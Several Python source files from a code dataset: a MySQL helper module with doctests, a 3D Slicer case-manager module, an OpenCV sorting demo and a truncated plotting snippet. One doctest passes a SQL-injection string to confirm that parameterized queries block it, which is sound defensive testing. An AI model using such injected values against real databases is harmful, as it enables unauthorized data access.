time.time()-start\n\t\tif t>0.1:\n\t\t\tlogging.warning('[PROFILING] [DB] %s: %s' % (t, sql))\n\t\telse:\n\t\t\tlogging.info('[PROFILING] [DB] %s: %s' % (t, sql))\n\nclass DBError(Exception):\n\tpass\n\t\n\nclass MultiColumnsError(DBError):\n\tpass\n\n#global engine object 保存着mysql数据库的连接\nengine = None\n\n#数据库引擎对象\nclass _Engine(object):\n\tdef __init__ (self,connect):\n\t\tself._connect = connect\n\tdef connect (self):\n\t\treturn self._connect()\n\n#创建引擎\ndef create_engine (user,password,database,host='127.0.0.1',port=3306,**kw):\n\timport mysql.connector\n\tglobal engine\n\tif engine is not None:\n\t\traise DBError('Engine is already initialized.')\n\tparams = dict(user=user,password=password,database=database,host=host,port=port)\n\tdefaults = dict(use_unicode=True, charset='utf8', collation='utf8_general_ci', autocommit=False)\n\t'''\n\t\t将defaults和kw中的键值对保存到params中 如果有一个key两边都存在那么保存kw的.\n\t\tpop函数会将key为k的键值对删除并且返回k对应的value 如果k在kw中不存在 那么将会返回v\n\t'''\n\tfor k,v in defaults.iteritems():\n\t\tparams[k] = kw.pop(k,v)\n\t#字典kw的键/值对更新到params里\n\tparams.update(kw)\n\tparams['buffered'] = True\n\t#在这里(lambda:mysql.connector.connect(**params))返回的是一个函数而不是一个connection对象\n\tengine = _Engine(lambda:mysql.connector.connect(**params))\n\tlogging.info('Init mysql engine <%s> ok.' %hex(id(engine)))\t\n\t\n\nclass _LasyConnection(object):\n\tdef __init__ (self):\n\t\tself.connection = None\n\n\tdef cursor (self):\n\t\tif self.connection is None:\n\t\t\tconnection = engine.connect()\n\t\t\tlogging.info('open connection <%s>...' %hex(id(connection)))\n\t\t\tself.connection = connection\n\t\treturn self.connection.cursor()\n\t\n\tdef commit (self):\n\t\tself.connection.commit()\n\t\n\tdef rollback (self):\n\t\tself.connection.rollback()\n\n\tdef cleanup (self):\n\t\tif self.connection:\n\t\t\tconnection = self.connection\n\t\t\tself.connecion = None\n\t\t\tlogging.info('close connection <%s>...' % hex(id(connection)))\n\t\t\tconnection.close()\n\n#接下来解决对于不同的线程数据库链接应该是不一样的 于是创建一个变量 是一个threadlocal 对象\nclass _DbCtx(threading.local):\n\tdef __init__ (self):\n\n\t\tself.connection = None\n\t\tself.transactions = 0\n\t\n\tdef is_init (self):\n\t\treturn not self.connection is None\n\n\tdef init (self):\n\t\tlogging.info('open lazy connection...')\n\t\tself.connection = _LasyConnection()\n\t\tself.transactions = 0\n\n\tdef cleanup (self):\n\t\tself.connection.cleanup()\n\t\tself.connection = None\n\n\tdef cursor (self):\n\t\treturn self.connection.cursor()\n\n_db_ctx = _DbCtx()\n\n#通过with语句让数据库链接可以自动创建和关闭\n'''\n\twith 语句:\n\twith 后面的语句会返回 _ConnectionCtx 对象 然后调用这个对象的 __enter__方法得到返回值 返回值赋值给as后面的变量 然后执行\n\twith下面的语句 执行完毕后 调用那个对象的 __exit__()方法\n'''\nclass _ConnectionCtx(object):\n\tdef __enter__ (self):\n\t\tglobal _db_ctx\n\t\tself.should_cleanup = False\n\t\tif not _db_ctx.is_init():\n\t\t\t_db_ctx.init()\n\t\t\tself.should_cleanup = True\n\t\treturn self\n\n\tdef __exit__(self,exctype,excvalue,traceback):\n\t\tglobal _db_ctx\n\t\tif self.should_cleanup:\n\t\t\t_db_ctx.cleanup()\n\ndef connection ():\n\treturn _ConnectionCtx()\n#采用装饰器的方法 让其能够进行共用同一个数据库连接\ndef with_connection (func):\n\t@functools.wraps(func)\n\tdef _wrapper (*args,**kw):\n\t\twith _ConnectionCtx():\n\t\t\treturn func(*args,**kw)\n\treturn _wrapper\n\nclass _TransactionCtx(object): \n\tdef __enter__ (self):\n\t\tglobal _db_ctx\n\t\tself.should_close_conn = False\n\t\tif not _db_ctx.is_init():\n\t\t\t_db_ctx.init()\n\t\t\tself.should_close_conn = True\n\t\t_db_ctx.transactions = _db_ctx.transactions +1\n\t\tlogging.info('begin transaction...' if _db_ctx.transactions==1 else 'join current transaction...')\n\t\treturn self\n\n\tdef __exit__ (self,exctype,excvalue,traceback):\n\t\tglobal _db_ctx\n\t\t_db_ctx.transactions = _db_ctx.transactions -1\n\t\ttry:\n\t\t\tif _db_ctx.transactions==0:\n\t\t\t\tif exctype is None:\n\t\t\t\t\tself.commit()\n\t\t\t\telse:\n\t\t\t\t\tself.rollback()\n\n\t\tfinally:\n\t\t\tif self.should_close_conn:\n\t\t\t\t_db_ctx.cleanup()\n\n\tdef commit (self):\n\t\tglobal _db_ctx\n\t\tlogging.info('commit transaction...')\n\t\ttry:\n\t\t\t_db_ctx.connection.commit()\n\t\t\tlogging.info('commit ok.')\n\t\texcept:\n\t\t\tlogging.warning('commit failed. try rollback...')\n\t\t\t_db_ctx.connection.rollback()\n\t\t\tlogging.warning('rollback ok.')\n\t\t\traise\n\n\tdef rollback (self):\n\t\tglobal _db_ctx\n\t\tlogging.warning('rollback transaction...')\n\t\t_db_ctx.connection.rollback()\n\t\tlogging.info('rollback ok.')\t\n\ndef transaction ():\n\t'''\n\tCreate a transaction object so can use with statement:\n\n\twith transaction():\n\t\tpass\n\t>>> def update_profile(id, name, rollback):\n\t...\t\tu = dict(id=id, name=name, email='%s@test.org' % name, passwd=name, last_modified=time.time())\n\t...\t\tinsert('user', **u)\n\t...\t\tr = update('update user set passwd=? where id=?', name.upper(), id)\n\t...\t\tif rollback:\n\t...\t\t\traise StandardError('will cause rollback...')\n\t>>> with transaction():\n\t...\t\tupdate_profile(900301, 'Python', False)\t\t\n\t>>> select_one('select * from user where id=?',900301).name\n\tu'Python'\n\t>>> with transaction():\n\t... \tupdate_profile(900302,'Ruby',True)\n\tTraceback (most recent call last):\n\t\t...\n\tStandardError: will cause rollback...\n\t>>> select('select * from user where id = ?',900302)\n\t[]\n\t'''\n\treturn _TransactionCtx()\n\ndef with_transaction (func):\n\t'''\n\tA decorator that makes function around transaction.\n\n\t>>> @with_transaction\n\t... def update_profile(id,name,rollback):\n\t... \tu = dict(id=id, name=name, email='%s@test.org' % name, passwd=name, last_modified=time.time())\n\t... \tinsert('user',**u)\n\t... \tr = update('update user set passwd=? where id = ?',name.upper(),id)\n\t... \tif rollback:\n\t... \t\traise StandardError('will cause rollback...')\n\t>>> update_profile(8080,'Julia',False)\n\t>>> select_one('select * from user where id = ?',8080).passwd\n\tu'JULIA'\n\t>>> update_profile(9090,'Robert',True)\n\tTraceback (most recent call last):\n\t\t...\n\tStandardError: will cause rollback...\n\t>>> select('select * from user where id=?',9090)\n\t[]\n\t'''\n\t@functools.wraps(func)\n\tdef _wrapper (*args,**kw):\n\t\t_start = time.time()\n\t\twith _TransactionCtx():\n\t\t\treturn func(*args, **kw)\n\t\t_profiling(_start)\n\treturn _wrapper\n\ndef _select(sql,first,*args):\n\tglobal _db_ctx\n\tcursor = None\n\tsql = sql.replace('?','%s')\n\tlogging.info('SQL: %s, ARGS: %s' % (sql, args))\n\ttry:\n\t\tcursor = _db_ctx.connection.cursor()\n\t\tcursor.execute(sql,args)\n\t\tif cursor.description:\n\t\t\tnames = [x[0] for x in cursor.description]\n\t\tif first:\n\t\t\tvalues = cursor.fetchone()\n\t\t\tif not values:\n\t\t\t\treturn None\n\t\t\treturn Dict(names,values)\n\t\treturn [Dict(names,x) for x in cursor.fetchall()]\n\tfinally:\n\t\tif cursor:\n\t\t\tcursor.close()\n\n@with_connection\ndef select_one(sql,*args):\n\t'''\n\tExecute select SQL and expected one result.\n\tIf no result found, return None.\n\tIf multiple results found, the first one returned.\n\t>>> u1 = dict(id=100, name='Alice', email='alice@test.org', passwd='ABC-12345', last_modified=time.time())\n\t>>> u2 = dict(id=101, name='Sarah', email='sarah@test.org', passwd='ABC-12345', last_modified=time.time())\n\t>>> insert('user',**u1)\n\t1\n\t>>> insert('user',**u2)\n\t1\n\t>>> u = select_one('select * from user where id=?',100)\n\t>>> u.name\n\tu'Alice'\n\t>>> select_one('select * from user where email=?','abc@email.com')\n\t>>> u2 = select_one('select * from user where passwd=? order by email','ABC-12345')\n\t>>> u2.name\n\tu'Alice'\n\t'''\n\treturn _select(sql,True,*args)\n\n@with_connection\ndef select_int (sql,*args):\n\t'''\n\tExecute select SQL and expected one int and only one int result. \n\n\t>>> n = update('delete from user')\n\t>>> u1 = dict(id=96900, name='Ada', email='ada@test.org', passwd='A-12345', last_modified=time.time())\n\t>>> u2 = dict(id=96901, name='Adam', email='adam@test.org', passwd='A-12345', last_modified=time.time())\n\t>>> insert('user',**u1)\n\t1\n\t>>> insert('user', **u2)\n\t1\n\t>>> select_int('select count(*) from user')\n\t2\n\t>>> select_int('select count(*) from user where email=?', 'ada@test.org')\n\t1\n\t>>> select_int('select count(*) from user where email=?', 'notexist@test.org')\n\t0\n\t>>> select_int('select id from user where email=?', 'ada@test.org')\n\t96900\n\t>>> select_int('select id, name from user where email=?', 'ada@test.org')\n\tTraceback (most recent call last):\n\t\t...\n\tMultiColumnsError: Expect only one column.\n\t'''\n\td = _select(sql,True,*args)\n\tif len(d)!=1:\n\t\traise MultiColumnsError('Expect only one column.')\n\treturn d.values()[0]\n\t\n@with_connection\ndef select(sql,*args):\n\t'''\n\tExecute select SQL and return list or empty list if no result.\n\n\t>>> u1 = dict(id=200, name='Wall.E', email='wall.e@test.org', passwd='back-to-earth', last_modified=time.time())\n\t>>> u2 = dict(id=201, name='Eva', email='eva@test.org', passwd='back-to-earth', last_modified=time.time())\n\t>>> insert('user', **u1)\n\t1\n\t>>> insert('user', **u2)\n\t1\n\t>>> L = select('select * from user where id=?', 900900900)\n\t>>> L\n\t[]\n\t>>> L = select('select * from user where id=?', 200)\n\t>>> L[0].email\n\tu'wall.e@test.org'\n\t>>> L = select('select * from user where passwd=? order by id desc', 'back-to-earth')\n\t>>> L[0].name\n\tu'Eva'\n\t>>> L[1].name\n\tu'Wall.E'\n\n\t'''\n\treturn _select(sql,False,*args)\n\n@with_connection\ndef _update (sql,*args):\n\tglobal _db_ctx\n\tcursor = None\n\t\n\tsql = sql.replace('?', '%s')\n\tlogging.info('SQL: %s, ARGS: %s' % (sql, args))\n\ttry:\n\t\tcursor = _db_ctx.connection.cursor()\n\t\tcursor.execute(sql, args)\n\t\tr = cursor.rowcount\n\t\tif _db_ctx.transactions==0:\n\t\t\tlogging.info('auto commit')\n\t\t\t_db_ctx.connection.commit()\n\t\treturn r\n\tfinally:\n\t\tif cursor:\n\t\t\tcursor.close()\n\n\ndef insert (table,**kw):\n\t'''\n\tExecute insert SQL.\n\n\t>>> u1 = dict(id=2000, name='Bob', email='bob@test.org', passwd='bobobob', last_modified=time.time())\n\t>>> insert('user', **u1)\n\t1\n\t>>> u2 = select_one('select * from user where id=?', 2000)\n\t>>> u2.name\n\tu'Bob'\n\t>>> insert('user', **u2)\n\tTraceback (most recent call last):\n\t\t...\n\tIntegrityError: 1062 (23000): Duplicate entry '2000' for key 'PRIMARY'\n\t'''\n\tcols,args = zip(*kw.iteritems())\n\tsql = 'insert into `%s` (%s) values (%s)' % (table, ','.join(['`%s`' % col for col in cols]), ','.join(['?' for i in range(len(cols))]))\n\treturn _update(sql, *args)\t\n\ndef update (sql,*args):\n\tr'''\n\tExecute update SQL.\n\n\t>>> u1 = dict(id=1000, name='Michael', email='michael@test.org', passwd='123456', last_modified=time.time())\n\t>>> insert('user',**u1)\n\t1\n\t>>> u2 = select_one('select * from user where id=?', 1000)\n\t>>> u2.email\n\tu'michael@test.org'\n\t>>> u2.passwd\n\tu'123456'\n\t>>> update('update user set email=?, passwd=? where id=?', 'michael@example.org', '654321', 1000)\n\t1\n\t>>> u3 = select_one('select * from user where id=?', 1000)\n\t>>> u3.email\n\tu'michael@example.org'\n\t>>> u3.passwd\n\tu'654321'\n\t>>> update('update user set passwd=? where id=?', '***', '123\\' or id=\\'456')\n\t0\n\t'''\n\treturn _update(sql, *args)\n\n\n\n\n\nif __name__=='__main__':\n\tlogging.basicConfig(level=logging.DEBUG)\n\tcreate_engine('www-data','www-data','awesome')\n\n\tsql = 'drop table if exists user'\n\tupdate(sql)\n\tupdate('create table user (id int primary key, name text, email text, passwd text, last_modified real)')\n\timport doctest\n\tdoctest.testmod()\n\t\n\n\n\t\t\n\t\t","sub_path":"awesome-python-webapp/www/transwarp/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":12869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"276181966","text":"import os\nimport csv, re, numpy, json, ast, re\nimport shutil, datetime, logging\nimport ctk, vtk, qt, slicer\nfrom collections import OrderedDict\n\n\n\nfrom slicer.ScriptedLoadableModule import *\nfrom SlicerProstateUtils.helpers import WatchBoxAttribute, BasicInformationWatchBox, DICOMBasedInformationWatchBox, IncomingDataWindow\nfrom SlicerProstateUtils.mixins import ModuleWidgetMixin, ModuleLogicMixin, ParameterNodeObservationMixin\nfrom SlicerProstateUtils.constants import DICOMTAGS, COLOR, STYLE, FileExtension\nfrom SlicerProstateUtils.events import SlicerProstateEvents\n\nclass SlicerCaseManager(ScriptedLoadableModule):\n def __init__(self, parent):\n ScriptedLoadableModule.__init__(self, parent)\n self.parent.title = \"SlicerCaseManager\"\n self.parent.categories = [\"Radiology\"]\n self.parent.dependencies = [\"SlicerProstate\"]\n self.parent.contributors = [\"Christian Herz (SPL)\",\"Longquan Chen(SPL)\"]\n self.parent.helpText = \"\"\"A common module for case management in Slicer\"\"\"\n self.parent.acknowledgementText = \"\"\"Surgical Planning Laboratory, Brigham and Women's Hospital, Harvard\n Medical School, Boston, USA This work was supported in part by the National\n Institutes of Health through grants R01 EB020667, U24 CA180918,\n R01 CA111288 and P41 EB015898. The code is originated from the module SliceTracker\"\"\"\n\nclass SlicerCaseManagerWidget(ModuleWidgetMixin, ScriptedLoadableModuleWidget):\n @property\n def caseRootDir(self):\n return self.casesRootDirectoryButton.directory\n\n @caseRootDir.setter\n def caseRootDir(self, path):\n try:\n exists = os.path.exists(path)\n except TypeError:\n exists = False\n self.setSetting('CasesRootLocation', path if exists else None)\n self.casesRootDirectoryButton.text = self.truncatePath(path) if exists else \"Choose output directory\"\n self.casesRootDirectoryButton.toolTip = path\n self.openCaseButton.enabled = exists\n self.createNewCaseButton.enabled = exists\n \n @property\n def caseDirectoryList(self):\n return self._caseDirectoryList\n\n @caseDirectoryList.setter\n def caseDirectoryList(self,list):\n self._caseDirectoryList = list \n \n @property\n def preopDataDir(self):\n return self._preopDataDir\n\n @preopDataDir.setter\n def preopDataDir(self, path):\n self._preopDataDir = path\n if path is None:\n return\n if os.path.exists(path):\n self.loadPreopData()\n \n @property\n def mpReviewPreprocessedOutput(self):\n return os.path.join(self.currentCaseDirectory, \"mpReviewPreprocessed\") if self.currentCaseDirectory else None\n\n @property\n def preopDICOMDataDirectory(self):\n return os.path.join(self.currentCaseDirectory, \"DICOM\", \"Preop\") if self.currentCaseDirectory else None\n\n @property\n def intraopDICOMDataDirectory(self):\n return os.path.join(self.currentCaseDirectory, \"DICOM\", \"Intraop\") if self.currentCaseDirectory else None\n\n @property\n def outputDir(self):\n return os.path.join(self.currentCaseDirectory, \"SliceTrackerOutputs\")\n\n @property\n def currentCaseDirectory(self):\n return self._currentCaseDirectory\n\n @property\n def currentTargets(self):\n return self._currentTargets\n\n @currentTargets.setter\n def currentTargets(self, targets):\n self._currentTargets = targets\n self.targetTableModel.targetList = targets\n if not targets:\n self.targetTableModel.coverProstateTargetList = None\n else:\n coverProstate = self.registrationResults.getMostRecentApprovedCoverProstateRegistration()\n if coverProstate:\n self.targetTableModel.coverProstateTargetList = coverProstate.approvedTargets\n self.targetTable.enabled = targets is not None\n\n @currentCaseDirectory.setter\n def currentCaseDirectory(self, path):\n self._currentCaseDirectory = path\n valid = path is not None\n self.closeCaseButton.enabled = valid\n if not valid:\n self.caseWatchBox.reset()\n\n @property\n def generatedOutputDirectory(self):\n return self._generatedOutputDirectory\n\n @generatedOutputDirectory.setter\n def generatedOutputDirectory(self, path):\n if not os.path.exists(path):\n self.logic.createDirectory(path)\n exists = os.path.exists(path)\n self._generatedOutputDirectory = path if exists else \"\"\n self.completeCaseButton.enabled = exists and not self.logic.caseCompleted\n \n @property\n def mainGUIGroupBox(self):\n return self._mainGUIGroupBox\n\n @property\n def collapsibleDirectoryConfigurationArea(self):\n return self._collapsibleDirectoryConfigurationArea\n \n def __init__(self, parent=None):\n ScriptedLoadableModuleWidget.__init__(self, parent)\n self.logic = SlicerCaseManagerLogic()\n self.modulePath = os.path.dirname(slicer.util.modulePath(self.moduleName))\n self._currentCaseDirectory = None\n self._caseDirectoryList = {}\n self.caseDirectoryList = {\"DICOM/Preop\", \"Results\"}\n\n def setup(self):\n #ScriptedLoadableModuleWidget.setup(self)\n\n self._mainGUIGroupBox = qt.QGroupBox()\n self._collapsibleDirectoryConfigurationArea = ctk.ctkCollapsibleButton()\n self.mainGUIGroupBoxLayout = qt.QGridLayout()\n self._mainGUIGroupBox.setLayout(self.mainGUIGroupBoxLayout)\n self.createNewCaseButton = self.createButton(\"New case\")\n self.openCaseButton = self.createButton(\"Open case\")\n self.closeCaseButton = self.createButton(\"Close case\", toolTip=\"Close case without completing it\", enabled=False)\n self.completeCaseButton = self.createButton('Case completed', enabled=True)\n self.mainGUIGroupBoxLayout.addWidget(self.createNewCaseButton, 1, 0)\n self.mainGUIGroupBoxLayout.addWidget(self.openCaseButton, 1, 1)\n self.mainGUIGroupBoxLayout.addWidget(self.completeCaseButton, 1, 2)\n \n self.createPatientWatchBox()\n #self.createIntraopWatchBox()\n self.createCaseInformationArea()\n self.setupConnections()\n self.layout.addWidget(self._mainGUIGroupBox)\n\n \n def updateOutputFolder(self):\n if os.path.exists(self.generatedOutputDirectory):\n return\n if self.patientWatchBox.getInformation(\"PatientID\") != '' \\\n and self.intraopWatchBox.getInformation(\"StudyDate\") != '':\n if self.outputDir and not os.path.exists(self.outputDir):\n self.logic.createDirectory(self.outputDir)\n finalDirectory = self.patientWatchBox.getInformation(\"PatientID\") + \"-biopsy-\" + \\\n str(qt.QDate().currentDate()) + \"-\" + qt.QTime().currentTime().toString().replace(\":\", \"\")\n self.generatedOutputDirectory = os.path.join(self.outputDir, finalDirectory, \"MRgBiopsy\")\n else:\n self.generatedOutputDirectory = \"\"\n\n def createPatientWatchBox(self):\n self.patientWatchBoxInformation = [WatchBoxAttribute('PatientID', 'Patient ID: ', DICOMTAGS.PATIENT_ID),\n WatchBoxAttribute('PatientName', 'Patient Name: ', DICOMTAGS.PATIENT_NAME),\n WatchBoxAttribute('DOB', 'Date of Birth: ', DICOMTAGS.PATIENT_BIRTH_DATE),\n WatchBoxAttribute('StudyDate', 'Preop Study Date: ', DICOMTAGS.STUDY_DATE)]\n self.patientWatchBox = DICOMBasedInformationWatchBox(self.patientWatchBoxInformation)\n self.layout.addWidget(self.patientWatchBox)\n \n def createIntraopWatchBox(self):\n intraopWatchBoxInformation = [WatchBoxAttribute('StudyDate', 'Intraop Study Date: ', DICOMTAGS.STUDY_DATE),\n WatchBoxAttribute('CurrentSeries', 'Current Series: ', [DICOMTAGS.SERIES_NUMBER,\n DICOMTAGS.SERIES_DESCRIPTION])]\n self.intraopWatchBox = DICOMBasedInformationWatchBox(intraopWatchBoxInformation)\n self.registrationDetailsButton = self.createButton(\"\", styleSheet=\"border:none;\",\n maximumWidth=16)\n self.layout.addWidget(self.intraopWatchBox)\n \n def createCaseInformationArea(self):\n self.casesRootDirectoryButton = self.createDirectoryButton(text=\"Choose cases root location\",\n caption=\"Choose cases root location\",\n directory=self.getSetting('CasesRootLocation'))\n self.createCaseWatchBox()\n self._collapsibleDirectoryConfigurationArea.collapsed = True\n self._collapsibleDirectoryConfigurationArea.text = \"Case Directory Settings\"\n self.directoryConfigurationLayout = qt.QGridLayout(self._collapsibleDirectoryConfigurationArea)\n self.directoryConfigurationLayout.addWidget(qt.QLabel(\"Cases Root Directory\"), 1, 0, 1, 1)\n self.directoryConfigurationLayout.addWidget(self.casesRootDirectoryButton, 1, 1, 1, 1)\n self.directoryConfigurationLayout.addWidget(self.caseWatchBox, 2, 0, 1, qt.QSizePolicy.ExpandFlag)\n self.layout.addWidget(self._collapsibleDirectoryConfigurationArea)\n\n def createCaseWatchBox(self):\n watchBoxInformation = [WatchBoxAttribute('CurrentCaseDirectory', 'Directory')]\n self.caseWatchBox = BasicInformationWatchBox(watchBoxInformation, title=\"Current Case\")\n\n\n def setupConnections(self):\n self.createNewCaseButton.clicked.connect(self.onCreateNewCaseButtonClicked)\n self.openCaseButton.clicked.connect(self.onOpenCaseButtonClicked)\n self.casesRootDirectoryButton.directoryChanged.connect(lambda: setattr(self, \"caseRootDir\",\n self.casesRootDirectoryButton.directory))\n self.completeCaseButton.clicked.connect(self.onCompleteCaseButtonClicked)\n self.closeCaseButton.clicked.connect(self.clearData)\n\n def onCreateNewCaseButtonClicked(self):\n if not self.checkAndWarnUserIfCaseInProgress():\n return\n self.clearData()\n self.caseDialog = NewCaseSelectionNameWidget(self.caseRootDir)\n selectedButton = self.caseDialog.exec_()\n if selectedButton == qt.QMessageBox.Ok:\n newCaseDirectory = self.caseDialog.newCaseDirectory\n os.mkdir(newCaseDirectory)\n for direcory in self.caseDirectoryList:\n subDirectory = direcory.split(\"/\")\n for iIndex in range(len(subDirectory)+1):\n fullPath = \"\"\n for jIndex in range(iIndex):\n fullPath = os.path.join(fullPath,subDirectory[jIndex])\n if not os.path.exists(os.path.join(newCaseDirectory,fullPath)): \n os.mkdir(os.path.join(newCaseDirectory,fullPath)) \n self.currentCaseDirectory = newCaseDirectory \n self.startPreopDICOMReceiver()\n \n def onCompleteCaseButtonClicked(self):\n self.logic.caseCompleted = True\n shutil.rmtree(os.path.join(self.currentCaseDirectory, \"Results\"))\n slicer.util.saveScene(os.path.join(self.currentCaseDirectory, \"Results\"))\n self.clearData()\n \n def onOpenCaseButtonClicked(self):\n if not self.checkAndWarnUserIfCaseInProgress():\n return\n slicer.mrmlScene.Clear(0)\n path = qt.QFileDialog.getExistingDirectory(self.parent.window(), \"Select Case Directory\", self.caseRootDir)\n if not path:\n return\n self.currentCaseDirectory = path\n if (not os.path.exists(os.path.join(path, \"DICOM\", \"Preop\")) ) or (not os.path.exists(os.path.join(path, \"Results\")) ):\n slicer.util.warningDisplay(\"The selected case directory seems not to be valid\", windowTitle=\"\")\n self.clearData()\n else:\n #slicer.util.loadVolume(self.preopImagePath, returnNode=True)\n slicer.util.loadScene(os.path.join(path, \"Results\",\"Results.mrml\"))\n\n def checkAndWarnUserIfCaseInProgress(self):\n proceed = True\n if self.currentCaseDirectory is not None:\n if not slicer.util.confirmYesNoDisplay(\"Current case will be closed. Do you want to proceed?\"):\n proceed = False\n return proceed\n\n def startPreopDICOMReceiver(self):\n self.preopTransferWindow = IncomingDataWindow(incomingDataDirectory=self.preopDICOMDataDirectory,\n skipText=\"No Preop available\")\n self.preopTransferWindow.addObserver(SlicerProstateEvents.IncomingDataSkippedEvent,\n self.continueWithoutPreopData)\n self.preopTransferWindow.addObserver(SlicerProstateEvents.IncomingDataCanceledEvent,\n self.onPreopTransferMessageBoxCanceled)\n self.preopTransferWindow.addObserver(SlicerProstateEvents.IncomingDataReceiveFinishedEvent,\n self.startPreProcessingPreopData)\n self.preopTransferWindow.show()\n \n def continueWithoutPreopData(self, caller, event):\n self.cleanupPreopDICOMReceiver()\n self.simulatePreopPhaseButton.enabled = False\n self.simulateIntraopPhaseButton.enabled = True\n \n def cleanupPreopDICOMReceiver(self):\n if self.preopTransferWindow:\n self.preopTransferWindow.hide()\n self.preopTransferWindow.removeObservers()\n self.preopTransferWindow = None\n \n def onPreopTransferMessageBoxCanceled(self,caller, event):\n self.clearData()\n pass\n\n def startPreProcessingPreopData(self, caller=None, event=None):\n self.cleanupPreopDICOMReceiver()\n ## to do, use mpreview to process the dicom series\n ## here it only load the volumes in the directory\n for subdir, dirs, files in os.walk(self.preopDICOMDataDirectory):\n for file in files:\n if not file[0] == \".\":\n slicer.util.loadVolume(os.path.join(self.preopDICOMDataDirectory, file))\n \n pass\n\n\n def loadCaseData(self):\n\n pass\n \n def clearData(self):\n pass\n\nclass SlicerCaseManagerLogic(ScriptedLoadableModuleLogic):\n \n @property\n def caseCompleted(self):\n return self._caseCompleted\n\n @caseCompleted.setter\n def caseCompleted(self, value):\n self._caseCompleted = value\n if value is True:\n self.stopSmartDICOMReceiver()\n \n def __init__(self):\n ScriptedLoadableModuleLogic.__init__(self)\n self.caseCompleted = True\n self.DEFAULT_JSON_FILE_NAME = \"results.json\"\n \n def stopSmartDICOMReceiver(self):\n self.smartDicomReceiver = getattr(self, \"smartDicomReceiver\", None)\n if self.smartDicomReceiver:\n self.smartDicomReceiver.stop()\n self.smartDicomReceiver.removeObservers()\n \n def closeCase(self, directory):\n self.stopSmartDICOMReceiver()\n if os.path.exists(directory):\n self.caseCompleted = False\n if self.getDirectorySize(directory) == 0:\n shutil.rmtree(directory)\n \n def hasCaseBeenCompleted(self, directory):\n self.caseCompleted = False\n filename = os.path.join(directory, self.DEFAULT_JSON_FILE_NAME)\n if not os.path.exists(filename):\n return\n with open(filename) as data_file:\n data = json.load(data_file)\n self.caseCompleted = data[\"completed\"]\n return self.caseCompleted\n \nclass NewCaseSelectionNameWidget(qt.QMessageBox, ModuleWidgetMixin):\n\n PREFIX = \"Case\"\n SUFFIX = \"-\" + datetime.date.today().strftime(\"%Y%m%d\")\n SUFFIX_PATTERN = \"-[0-9]{8}\"\n CASE_NUMBER_DIGITS = 3\n PATTERN = PREFIX+\"[0-9]{\"+str(CASE_NUMBER_DIGITS-1)+\"}[0-9]{1}\"+SUFFIX_PATTERN\n\n def __init__(self, destination, parent=None):\n super(NewCaseSelectionNameWidget, self).__init__(parent)\n if not os.path.exists(destination):\n raise\n self.destinationRoot = destination\n self.newCaseDirectory = None\n self.minimum = self.getNextCaseNumber()\n self.setupUI()\n self.setupConnections()\n self.onCaseNumberChanged(self.minimum)\n\n def getNextCaseNumber(self):\n import re\n caseNumber = 0\n for dirName in [dirName for dirName in os.listdir(self.destinationRoot)\n if os.path.isdir(os.path.join(self.destinationRoot, dirName)) and re.match(self.PATTERN, dirName)]:\n number = int(re.split(self.SUFFIX_PATTERN, dirName)[0].split(self.PREFIX)[1])\n caseNumber = caseNumber if caseNumber > number else number\n return caseNumber+1\n\n def setupUI(self):\n self.setWindowTitle(\"Case Number Selection\")\n self.setText(\"Please select a case number for the new case.\")\n self.setIcon(qt.QMessageBox.Question)\n self.spinbox = qt.QSpinBox()\n self.spinbox.setRange(self.minimum, int(\"9\"*self.CASE_NUMBER_DIGITS))\n self.preview = qt.QLabel()\n self.notice = qt.QLabel()\n self.layout().addWidget(self.createVLayout([self.createHLayout([qt.QLabel(\"Proposed Case Number\"), self.spinbox]),\n self.preview, self.notice]), 2, 1)\n self.okButton = self.addButton(self.Ok)\n self.okButton.enabled = False\n self.cancelButton = self.addButton(self.Cancel)\n self.setDefaultButton(self.okButton)\n\n def setupConnections(self):\n self.spinbox.valueChanged.connect(self.onCaseNumberChanged)\n\n def onCaseNumberChanged(self, caseNumber):\n formatString = '%0'+str(self.CASE_NUMBER_DIGITS)+'d'\n caseNumber = formatString % caseNumber\n directory = self.PREFIX+caseNumber+self.SUFFIX\n self.newCaseDirectory = os.path.join(self.destinationRoot, directory)\n self.preview.setText(\"New case directory: \" + self.newCaseDirectory)\n self.okButton.enabled = not os.path.exists(self.newCaseDirectory)\n self.notice.text = \"\" if not os.path.exists(self.newCaseDirectory) else \"Note: Directory already exists.\"","sub_path":"VentriculostomyPlanning/SlicerCaseManager.py","file_name":"SlicerCaseManager.py","file_ext":"py","file_size_in_byte":17206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"359189613","text":"import numpy as np, cv2\r\n\r\nm = np.random.randint(0, 100, 15).reshape(3, 5) # 임의 난수 생성\r\n\r\n##행렬 원소 정렬\r\nsort1 = cv2.sort(m, cv2.SORT_EVERY_ROW) # 행단위(가로 방향) 오름차순\r\nsort2 = cv2.sort(m, cv2.SORT_EVERY_COLUMN) # 열단위(세로 방향) 내림차순\r\nsort3 = cv2.sort(m, cv2.SORT_EVERY_ROW + cv2.SORT_DESCENDING) # 행단위 내림차순\r\nsort4 = np.sort(m, axis=1) # x축(가로 방향) 정렬\r\nsort5 = np.sort(m, axis=0) # y축(세로 방향) 정렬\r\nsort6 = np.sort(m, axis=1)[:, ::-1] # 열 방향 내림차순 정렬\r\n\r\ntitles = ['m', 'sort1', 'sort2', 'sort3', 'sort4', 'sort5', 'sort6']\r\nfor title in titles:\r\n print(\"[%s] = \\n%s\\n\" % (title, eval(title)))","sub_path":"CHAPTER5/5-13.sort.py","file_name":"5-13.sort.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"358830768","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef plot_result(result, label, show=False):\n scores = sort_results_for_plotting(list(result.values()))\n scores = np.array(scores)\n x = scores[:, 0]\n y = scores[:, 1]\n line, = plt.plot(x, y, '-o', label=label)\n if show:\n plt.show()\n return line\n\n\ndef plot_results(result_summaries):\n x_label = result_summaries[0][\"accuracy_metric\"]\n y_label = \"1 - \" + result_summaries[0][\"fairness_metric\"]\n plt.xlabel(x_label)\n plt.ylabel(y_label)\n lines = []\n for result_summary in result_summaries:\n lines.append(plot_result(result_summary[\"result\"], result_summary[\"name\"]))\n plt.legend(handles=lines)\n plt.show()\n\n\ndef sort_results_for_plotting(scores):\n return sorted(scores, key=lambda x: 